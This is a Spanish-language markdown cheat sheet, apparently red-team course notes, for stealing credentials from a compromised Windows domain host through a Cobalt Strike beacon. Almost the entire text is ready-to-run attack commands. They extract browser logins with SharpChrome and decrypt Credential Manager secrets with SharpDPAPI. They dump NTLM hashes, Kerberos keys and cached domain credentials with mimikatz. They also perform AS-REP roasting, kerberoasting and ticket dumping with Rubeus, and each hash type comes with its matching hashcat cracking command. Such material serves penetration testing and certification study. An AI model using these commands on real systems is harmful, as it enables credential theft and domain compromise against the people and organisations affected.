Skip to content

Latest commit

 

History

History
95 lines (61 loc) · 2.26 KB

File metadata and controls

95 lines (61 loc) · 2.26 KB

🗝️ EXTRACCIÓN DE CREDENCIALES DESDE NAVEGADORES WEB

  • Requiere Medium Level Beacon
beacon> execute-assembly C:\Tools\SharpDPAPI\SharpChrome\bin\Release\SharpChrome.exe logins

🛡️ EXTRACCIÓN DE CREDENCIALES: WINDOWS CREDENTIAL MANAGER

  • Requiere Medium Level Beacon, y acceso a la cuenta del usuario que queremos sacar las credenciales.

Enumeramos si hay credenciales guardadas

beacon> run vaultcmd /listcreds:"Windows Credentials" /all

Desciframos con SharpDPAPI

beacon> execute-assembly C:\Tools\SharpDPAPI\SharpDPAPI\bin\Release\SharpDPAPI.exe credentials /rpc

🧠 EXTRAER CREDS DEL OS

Sacar el NTLM -> Pass The Hash Debes tener high beacon y luego usar el ! para suplantar el ID de SYSTEM

beacon> mimikatz sekurlsa::logonpasswords
PS C:\Tools\hashcat> .\hashcat.exe -a 0 -m 1000 .\ntlm.hash .\example.dict -r .\rules\dive.rule

Sacar AES256 kerberos KEY -> el des_cbc_md4 mas largo.

beacon> mimikatz sekurlsa::ekeys
PS C:\Tools\hashcat> .\hashcat.exe -a 0 -m 28900 .\sha256.hash .\example.dict -r .\rules\dive.rule

📦 CREDENCIALES ALMACENADAS EN EL CACHE DEL DOMINIO

beacon> mimikatz !lsadump::cache
PS C:\Tools\hashcat> .\hashcat.exe -a 0 -m 2100 .\mscachev2.hash .\example.dict -r .\rules\dive.rule

🔥 KERBEROS TICKETS

AS-REP Roasting

Buscar cuentas

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /format:hashcat /nowrap
PS C:\Tools\hashcat> .\hashcat.exe -a 0 -m 18200 .\asrep.hash .\example.dict -r .\rules\dive.rule

Kerberoasting

Buscar cuentas

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /format:hashcat /simple
PS C:\Tools\hashcat> .\hashcat.exe -a 0 -m 13100 .\kerb.hash .\example.dict -r .\rules\dive.rule

Extraer Tickets

Debes tener High Level integrity

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage


beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x35b1d /service:krbtgt /nowrap